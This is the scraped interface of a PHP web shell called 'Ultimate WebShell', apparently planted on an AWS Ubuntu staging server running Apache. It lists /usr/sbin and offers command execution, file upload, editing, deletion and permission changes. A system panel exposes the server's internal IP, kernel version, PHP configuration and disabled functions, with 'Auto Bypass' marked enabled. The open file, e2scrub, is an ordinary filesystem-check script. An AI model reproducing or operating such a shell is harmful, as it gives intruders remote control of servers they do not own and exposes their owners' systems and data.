WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.236
System Info
HOME
snap
core24
1587
usr
sbin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-03-17 03:54:11
-
aa-load
File
38.75 KB
0755
2025-08-15 12:16:02
aa-remove-unknown
File
3.15 KB
0755
2025-08-15 12:16:02
aa-status
File
39.06 KB
0755
2025-08-15 12:16:02
aa-teardown
File
137 B
0755
2024-04-12 03:59:30
add-shell
File
1.03 KB
0755
2024-03-31 08:47:33
agetty
File
59.56 KB
0755
2026-03-06 16:00:54
apparmor_parser
File
1.55 MB
0755
2025-08-15 12:16:02
apparmor_status
File
39.06 KB
0755
2025-08-15 12:16:02
arpd
File
26.33 KB
0755
2025-07-10 14:46:54
arptables
File
219.16 KB
0755
2024-04-08 15:59:59
arptables-nft
File
219.16 KB
0755
2024-04-08 15:59:59
arptables-nft-restore
File
219.16 KB
0755
2024-04-08 15:59:59
arptables-nft-save
File
219.16 KB
0755
2024-04-08 15:59:59
arptables-restore
File
219.16 KB
0755
2024-04-08 15:59:59
arptables-save
File
219.16 KB
0755
2024-04-08 15:59:59
badblocks
File
34.32 KB
0755
2024-04-28 23:44:46
blkdeactivate
File
15.97 KB
0755
2024-11-27 19:06:49
blkdiscard
File
22.38 KB
0755
2026-03-06 16:00:54
blkid
File
54.41 KB
0755
2026-03-06 16:00:54
blkzone
File
34.38 KB
0755
2026-03-06 16:00:54
blockdev
File
34.38 KB
0755
2026-03-06 16:00:54
bridge
File
108.49 KB
0755
2025-07-10 14:46:54
capsh
File
57.09 KB
0755
2025-02-20 15:49:57
cfdisk
File
94.73 KB
0755
2026-03-06 16:00:54
chcpu
File
30.38 KB
0755
2026-03-06 16:00:54
chgpasswd
File
58.32 KB
0755
2024-05-30 14:52:35
chmem
File
34.38 KB
0755
2026-03-06 16:00:54
chpasswd
File
54.43 KB
0755
2024-05-30 14:52:35
chroot
File
38.51 KB
0755
2025-06-22 16:21:39
cpgr
File
48.45 KB
0755
2024-05-30 14:52:35
cppw
File
48.45 KB
0755
2024-05-30 14:52:35
cryptdisks_start
File
1.51 KB
0755
2024-06-05 13:46:49
cryptdisks_stop
File
844 B
0755
2024-06-05 13:46:49
cryptsetup
File
225.9 KB
0755
2024-11-14 03:44:47
ctrlaltdel
File
14.38 KB
0755
2026-03-06 16:00:54
dcb
File
80.52 KB
0755
2025-07-10 14:46:54
debugfs
File
225.87 KB
0755
2024-04-28 23:44:46
depmod
File
170.24 KB
0755
2024-10-02 12:40:49
devlink
File
150.86 KB
0755
2025-07-10 14:46:54
dhcpcd
File
395.4 KB
0755
2025-11-13 17:47:30
dmsetup
File
171.05 KB
0755
2024-11-27 19:06:49
dmstats
File
171.05 KB
0755
2024-11-27 19:06:49
dosfsck
File
78.38 KB
0755
2024-03-31 08:49:11
dosfslabel
File
38.38 KB
0755
2024-03-31 08:49:11
dumpe2fs
File
34.31 KB
0755
2024-04-28 23:44:46
e2freefrag
File
18.3 KB
0755
2024-04-28 23:44:46
e2fsck
File
364.34 KB
0755
2024-04-28 23:44:46
e2image
File
42.31 KB
0755
2024-04-28 23:44:46
e2label
File
110.56 KB
0755
2024-04-28 23:44:46
e2mmpstatus
File
34.31 KB
0755
2024-04-28 23:44:46
e2scrub
File
7.12 KB
0755
2024-04-28 23:44:46
e2scrub_all
File
5.27 KB
0755
2024-04-28 23:44:46
e2undo
File
22.3 KB
0755
2024-04-28 23:44:46
e4crypt
File
30.38 KB
0755
2024-04-28 23:44:46
e4defrag
File
34.3 KB
0755
2024-04-28 23:44:46
ebtables
File
219.16 KB
0755
2024-04-08 15:59:59
ebtables-nft
File
219.16 KB
0755
2024-04-08 15:59:59
ebtables-nft-restore
File
219.16 KB
0755
2024-04-08 15:59:59
ebtables-nft-save
File
219.16 KB
0755
2024-04-08 15:59:59
ebtables-restore
File
219.16 KB
0755
2024-04-08 15:59:59
ebtables-save
File
219.16 KB
0755
2024-04-08 15:59:59
ebtables-translate
File
219.16 KB
0755
2024-04-08 15:59:59
ethtool
File
651.68 KB
0755
2024-04-08 15:57:18
faillock
File
22.31 KB
0755
2025-09-15 12:37:15
fatlabel
File
38.38 KB
0755
2024-03-31 08:49:11
fdisk
File
114.42 KB
0755
2026-03-06 16:00:54
filefrag
File
18.32 KB
0755
2024-04-28 23:44:46
findfs
File
14.38 KB
0755
2026-03-06 16:00:54
fsck
File
42.42 KB
0755
2026-03-06 16:00:54
fsck.cramfs
File
30.44 KB
0755
2026-03-06 16:00:54
fsck.ext2
File
364.34 KB
0755
2024-04-28 23:44:46
fsck.ext3
File
364.34 KB
0755
2024-04-28 23:44:46
fsck.ext4
File
364.34 KB
0755
2024-04-28 23:44:46
fsck.fat
File
78.38 KB
0755
2024-03-31 08:49:11
fsck.minix
File
54.41 KB
0755
2026-03-06 16:00:54
fsck.msdos
File
78.38 KB
0755
2024-03-31 08:49:11
fsck.vfat
File
78.38 KB
0755
2024-03-31 08:49:11
fsfreeze
File
14.38 KB
0755
2026-03-06 16:00:54
fstab-decode
File
14.3 KB
0755
2024-04-08 16:20:36
fstrim
File
42.38 KB
0755
2026-03-06 16:00:54
genl
File
120.58 KB
0755
2025-07-10 14:46:54
getcap
File
14.3 KB
0755
2025-02-20 15:49:57
getpcaps
File
14.3 KB
0755
2025-02-20 15:49:57
getty
File
59.56 KB
0755
2026-03-06 16:00:54
groupadd
File
71.13 KB
0755
2024-05-30 14:52:35
groupdel
File
62.91 KB
0755
2024-05-30 14:52:35
groupmems
File
58.34 KB
0755
2024-05-30 14:52:35
groupmod
File
71.04 KB
0755
2024-05-30 14:52:35
grpck
File
58.32 KB
0755
2024-05-30 14:52:35
grpconv
File
50.16 KB
0755
2024-05-30 14:52:35
grpunconv
File
50.16 KB
0755
2024-05-30 14:52:35
halt
File
1.43 MB
0755
2025-11-25 18:16:31
iconvconfig
File
34.47 KB
0755
2026-01-30 08:27:54
init
File
98.45 KB
0755
2025-11-25 18:16:31
insmod
File
170.24 KB
0755
2024-10-02 12:40:49
installkernel
File
2.6 KB
0755
2024-03-31 08:47:33
integritysetup
File
67.06 KB
0755
2024-11-14 03:44:47
invoke-rc.d
File
16.13 KB
0755
2023-12-06 07:46:52
ip
File
597.62 KB
0755
2020-02-13 17:21:59
ip6tables
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-apply
File
6.89 KB
0755
2023-08-12 22:33:39
ip6tables-legacy
File
92.95 KB
0755
2024-04-08 15:59:59
ip6tables-legacy-restore
File
92.95 KB
0755
2024-04-08 15:59:59
ip6tables-legacy-save
File
92.95 KB
0755
2024-04-08 15:59:59
ip6tables-nft
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-nft-restore
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-nft-save
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-restore
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-restore-translate
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-save
File
219.16 KB
0755
2024-04-08 15:59:59
ip6tables-translate
File
219.16 KB
0755
2024-04-08 15:59:59
iptables
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-apply
File
6.89 KB
0755
2023-08-12 22:33:39
iptables-legacy
File
92.95 KB
0755
2024-04-08 15:59:59
iptables-legacy-restore
File
92.95 KB
0755
2024-04-08 15:59:59
iptables-legacy-save
File
92.95 KB
0755
2024-04-08 15:59:59
iptables-nft
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-nft-restore
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-nft-save
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-restore
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-restore-translate
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-save
File
219.16 KB
0755
2024-04-08 15:59:59
iptables-translate
File
219.16 KB
0755
2024-04-08 15:59:59
isosize
File
14.38 KB
0755
2026-03-06 16:00:54
killall5
File
26.23 KB
0755
2024-04-08 16:20:36
ldattach
File
26.38 KB
0755
2026-03-06 16:00:54
ldconfig
File
387 B
0755
2026-01-30 08:27:54
ldconfig.real
File
1 MB
0755
2026-01-30 08:27:54
logsave
File
14.16 KB
0755
2024-04-28 23:44:46
losetup
File
74.52 KB
0755
2026-03-06 16:00:54
lsmod
File
170.24 KB
0755
2024-10-02 12:40:49
mkdosfs
File
50.83 KB
0755
2024-03-31 08:49:11
mke2fs
File
130.62 KB
0755
2024-04-28 23:44:46
mkfs
File
14.38 KB
0755
2026-03-06 16:00:54
mkfs.bfs
File
22.38 KB
0755
2026-03-06 16:00:54
mkfs.cramfs
File
34.32 KB
0755
2026-03-06 16:00:54
mkfs.ext2
File
130.62 KB
0755
2024-04-28 23:44:46
mkfs.ext3
File
130.62 KB
0755
2024-04-28 23:44:46
mkfs.ext4
File
130.62 KB
0755
2024-04-28 23:44:46
mkfs.fat
File
50.83 KB
0755
2024-03-31 08:49:11
mkfs.minix
File
42.39 KB
0755
2026-03-06 16:00:54
mkfs.msdos
File
50.83 KB
0755
2024-03-31 08:49:11
mkfs.vfat
File
50.83 KB
0755
2024-03-31 08:49:11
mkhomedir_helper
File
22.34 KB
0755
2025-09-15 12:37:15
mklost+found
File
14.3 KB
0755
2024-04-28 23:44:46
mkswap
File
50.38 KB
0755
2026-03-06 16:00:54
modinfo
File
170.24 KB
0755
2024-10-02 12:40:49
modprobe
File
170.24 KB
0755
2024-10-02 12:40:49
netplan
File
802 B
0755
2025-01-20 18:19:16
newusers
File
86.96 KB
0755
2024-05-30 14:52:35
nfnl_osf
File
18.3 KB
0755
2024-04-08 15:59:59
nologin
File
14.3 KB
0755
2024-05-30 14:52:35
pam_extrausers_chkpwd
File
26.31 KB
2755
2025-09-15 12:37:15
pam_extrausers_update
File
34.31 KB
0755
2025-09-15 12:37:15
pam_namespace_helper
File
467 B
0755
2025-09-15 12:37:15
pam_timestamp_check
File
14.31 KB
0755
2025-09-15 12:37:15
pivot_root
File
14.38 KB
0755
2026-03-06 16:00:54
plymouthd
File
146.57 KB
0755
2025-02-25 05:47:08
poweroff
File
1.43 MB
0755
2025-11-25 18:16:31
pwck
File
54.29 KB
0755
2024-05-30 14:52:35
pwconv
File
46.16 KB
0755
2024-05-30 14:52:35
pwhistory_helper
File
22.31 KB
0755
2025-09-15 12:37:15
pwunconv
File
46.16 KB
0755
2024-05-30 14:52:35
readprofile
File
22.41 KB
0755
2026-03-06 16:00:54
reboot
File
1.43 MB
0755
2025-11-25 18:16:31
remove-shell
File
1.08 KB
0755
2024-03-31 08:47:33
resize2fs
File
70.3 KB
0755
2024-04-28 23:44:46
resolvconf
File
158.67 KB
0755
2025-11-25 18:16:31
rfkill
File
30.23 KB
0755
2026-03-06 16:00:54
rmmod
File
170.24 KB
0755
2024-10-02 12:40:49
rmt
File
54.71 KB
0755
2024-04-08 16:20:47
rmt-tar
File
54.71 KB
0755
2024-04-08 16:20:47
rtacct
File
28.31 KB
0755
2025-07-10 14:46:54
rtcwake
File
34.38 KB
0755
2026-03-06 16:00:54
rtmon
File
116.52 KB
0755
2025-07-10 14:46:54
runlevel
File
1.43 MB
0755
2025-11-25 18:16:31
runuser
File
54.38 KB
0755
2026-03-06 16:00:54
service
File
8.89 KB
0755
2023-12-06 07:50:15
setcap
File
14.3 KB
0755
2025-02-20 15:49:57
sfdisk
File
106.38 KB
0755
2026-03-06 16:00:54
shadowconfig
File
2.22 KB
0755
2024-05-07 13:44:18
shutdown
File
1.43 MB
0755
2025-11-25 18:16:31
sshd
File
899.82 KB
0755
2026-03-04 17:55:04
start-stop-daemon
File
47.49 KB
0755
2025-09-18 17:43:59
sudo_logsrvd
File
248.5 KB
0755
2026-03-02 12:56:19
sudo_sendlog
File
131.67 KB
0755
2026-03-02 12:56:19
sulogin
File
42.38 KB
0755
2026-03-06 16:00:54
swaplabel
File
18.38 KB
0755
2026-03-06 16:00:54
swapoff
File
22.38 KB
0755
2026-03-06 16:00:54
swapon
File
42.38 KB
0755
2026-03-06 16:00:54
switch_root
File
22.38 KB
0755
2026-03-06 16:00:54
sysctl
File
30.38 KB
0755
2024-09-26 08:44:05
tarcat
File
936 B
0755
2024-01-01 21:15:10
tc
File
630.08 KB
0755
2025-07-10 14:46:54
telinit
File
1.43 MB
0755
2025-11-25 18:16:31
tipc
File
90.52 KB
0755
2025-07-10 14:46:54
tune2fs
File
110.56 KB
0755
2024-04-28 23:44:46
ub-device-create
File
22.32 KB
0755
2026-03-06 15:59:02
unix_chkpwd
File
30.31 KB
2755
2025-09-15 12:37:15
unix_update
File
34.31 KB
0755
2025-09-15 12:37:15
update-ca-certificates
File
5.32 KB
0755
2024-02-04 09:41:43
update-passwd
File
34.56 KB
0755
2024-04-08 15:54:09
update-shells
File
3.89 KB
0755
2024-03-31 08:47:33
useradd
File
139.88 KB
0755
2024-05-30 14:52:35
userdel
File
91.01 KB
0755
2024-05-30 14:52:35
usermod
File
127.65 KB
0755
2024-05-30 14:52:35
vdpa
File
34.56 KB
0755
2025-07-10 14:46:54
veritysetup
File
43.94 KB
0755
2024-11-14 03:44:47
vigr
File
60.69 KB
0755
2024-05-30 14:52:35
vipw
File
60.69 KB
0755
2024-05-30 14:52:35
visudo
File
252.71 KB
0755
2026-03-02 12:56:19
wipefs
File
38.38 KB
0755
2026-03-06 16:00:54
wpa_action
File
1.69 KB
0755
2025-08-05 11:55:36
wpa_cli
File
140.31 KB
0755
2026-02-04 23:33:00
wpa_supplicant
File
3.22 MB
0755
2026-02-04 23:33:00
xtables-legacy-multi
File
92.95 KB
0755
2024-04-08 15:59:59
xtables-monitor
File
219.16 KB
0755
2024-04-08 15:59:59
xtables-nft-multi
File
219.16 KB
0755
2024-04-08 15:59:59
zic
File
66.39 KB
0755
2026-01-30 08:27:54
zramctl
File
54.52 KB
0755
2026-03-06 16:00:54
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: e2scrub
#!/bin/bash # Copyright (C) 2018 Oracle. All Rights Reserved. # # Author: Darrick J. Wong <darrick.wong@oracle.com> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it would be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write the Free Software Foundation, # Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA. # Automatically check an LVM-managed filesystem online. # We use lvm snapshots to do this, which means that we can only # check filesystems in VGs that have at least 256MB (or so) of # free space. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin if (( $EUID != 0 )); then echo "e2scrub must be run as root" exit 1 fi snap_size_mb=256 fstrim=0 reap=0 e2fsck_opts="" conffile="/etc/e2scrub.conf" test -f "${conffile}" && . "${conffile}" print_help() { echo "Usage: $0 [OPTIONS] mountpoint | device" echo echo "mountpoint must be on an LVM-managed block device" echo "-n: Show what commands e2scrub would execute." echo "-r: Remove e2scrub snapshot and exit, do not check anything." echo "-t: Run fstrim if successful." echo "-V: Print version information and exit." } print_version() { echo "e2scrub 1.47.0 (5-Feb-2023)" } exitcode() { ret="$1" # If we're being run as a service, the return code must fit the LSB # init script action error guidelines, which is to say that we # compress all errors to 1 ("generic or unspecified error", LSB 5.0 # section 22.2) and hope the admin will scan the log for what # actually happened. # We have to sleep 2 seconds here because journald uses the pid to # connect our log messages to the systemd service. This is critical # for capturing all the log messages if the scrub fails, because the # fail service uses the service name to gather log messages for the # error report. if [ -n "${SERVICE_MODE}" -a "${ret}" -ne 0 ]; then test "${ret}" -ne 0 && ret=1 sleep 2 fi exit "${ret}" } while getopts "nrtV" opt; do case "${opt}" in "n") DBG="echo Would execute: " ;; "r") reap=1;; "t") fstrim=1;; "V") print_version; exitcode 0;; *) print_help; exitcode 2;; esac done shift "$((OPTIND - 1))" arg="$1" if [ -z "${arg}" ]; then print_help exitcode 1 fi if ! type lsblk >& /dev/null ; then echo "e2scrub: can't find lsblk --- is util-linux installed?" exitcode 1 fi if ! type lvcreate >& /dev/null ; then echo "e2scrub: can't find lvcreate --- is lvm2 installed?" exitcode 1 fi # close file descriptor 3 (from cron) since it causes lvm to kvetch exec 3<&- # Find the device for a given mountpoint dev_from_mount() { local mountpt="$(realpath "$1")" lsblk -o NAME,FSTYPE,MOUNTPOINT -p -P -n 2> /dev/null | while read vars; do eval "${vars}" if [ "${mountpt}" != "${MOUNTPOINT}" ]; then continue fi case "${FSTYPE}" in ext[234]) echo "${NAME}" return 0 ;; esac done return 1 } # Check a device argument dev_from_arg() { local dev="$1" local fstype="$(lsblk -o FSTYPE -n "${dev}" 2> /dev/null)" case "${fstype}" in ext[234]) echo "${dev}" return 0 ;; esac return 1 } mnt_from_dev() { local dev="$1" if [ -n "${dev}" ]; then lsblk -o MOUNTPOINT -n "${dev}" fi } # Construct block device path and mountpoint from argument if [ -b "${arg}" ]; then dev="$(dev_from_arg "${arg}")" mnt="$(mnt_from_dev "${dev}")" else dev="$(dev_from_mount "${arg}")" mnt="${arg}" fi if [ ! -e "${dev}" ]; then echo "${arg}: Not an ext[234] filesystem." print_help exitcode 16 fi # Make sure this is an LVM device we can snapshot lvm_vars="$(lvs --nameprefixes -o name,vgname,lv_role --noheadings "${dev}" 2> /dev/null)" eval "${lvm_vars}" if [ -z "${LVM2_VG_NAME}" ] || [ -z "${LVM2_LV_NAME}" ] || echo "${LVM2_LV_ROLE}" | grep -q "snapshot"; then echo "${arg}: Not connected to an LVM logical volume." print_help exitcode 16 fi start_time="$(date +'%Y%m%d%H%M%S')" snap="${LVM2_LV_NAME}.e2scrub" snap_dev="/dev/${LVM2_VG_NAME}/${snap}" teardown() { # Remove and wait for removal to succeed. ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" while [ -e "${snap_dev}" ] && [ "$?" -eq "5" ]; do sleep 0.5 ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" done } check() { # First we recover the journal, then we see if e2fsck tries any # non-optimization repairs. If either of these two returns a # non-zero status (errors fixed or remaining) then this fs is bad. E2FSCK_FIXES_ONLY=1 export E2FSCK_FIXES_ONLY ${DBG} "/sbin/e2fsck" -E journal_only -p ${e2fsck_opts} "${snap_dev}" || return $? ${DBG} "/sbin/e2fsck" -f -y ${e2fsck_opts} "${snap_dev}" } mark_clean() { ${DBG} "/sbin/tune2fs" -C 0 -T "${start_time}" "${dev}" } mark_corrupt() { ${DBG} "/sbin/tune2fs" -E force_fsck "${dev}" } setup() { # Try to remove snapshot for 30s, bail out if we can't remove it. lvremove_deadline="$(( $(date "+%s") + 30))" ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" 2>/dev/null while [ -e "${snap_dev}" ] && [ "$?" -eq "5" ] && [ "$(date "+%s")" -lt "${lvremove_deadline}" ]; do sleep 0.5 ${DBG} lvremove -f "${LVM2_VG_NAME}/${snap}" done if [ -e "${snap_dev}" ]; then echo "${arg}: e2scrub snapshot is in use, cannot check!" return 1 fi # Create the snapshot, wait for device to appear. ${DBG} lvcreate -s -L "${snap_size_mb}m" -n "${snap}" "${LVM2_VG_NAME}/${LVM2_LV_NAME}" if [ $? -ne 0 ]; then echo "${arg}: e2scrub snapshot FAILED, will not check!" return 1 fi ${DBG} udevadm settle 2> /dev/null return 0 } if [ "${reap}" -gt 0 ]; then if [ -e "${snap_dev}" ]; then teardown 2> /dev/null fi exit 0 fi if ! setup; then exitcode 8 fi trap "teardown; exit 1" EXIT INT QUIT TERM # Check and react check case "$?" in "0") # Clean check! echo "${arg}: Scrub succeeded." mark_clean teardown trap '' EXIT # Trim the free space, which requires the snapshot be deleted. if [ "${fstrim}" -eq 1 ] && [ -d "${mnt}" ] && type fstrim > /dev/null 2>&1; then echo "${arg}: Trimming free space." fstrim -v "${mnt}" fi ret=0 ;; "8") # Operational error, what now? echo "${arg}: e2fsck operational error." teardown trap '' EXIT ret=8 ;; *) # fsck failed. Check if the snapshot is invalid; if so, make a # note of that at the end of the log. This isn't necessarily a # failure because the mounted fs could have overflowed the # snapshot with regular disk writes /or/ our repair process # could have done it by repairing too much. # # If it's really corrupt we ought to fsck at next boot. is_invalid="$(lvs -o lv_snapshot_invalid --noheadings "${snap_dev}" | awk '{print $1}')" if [ -n "${is_invalid}" ]; then echo "${arg}: Scrub FAILED due to invalid snapshot." ret=8 else echo "${arg}: Scrub FAILED due to corruption! Unmount and run e2fsck -y." mark_corrupt ret=6 fi teardown trap '' EXIT ;; esac exitcode "${ret}"
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.236 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED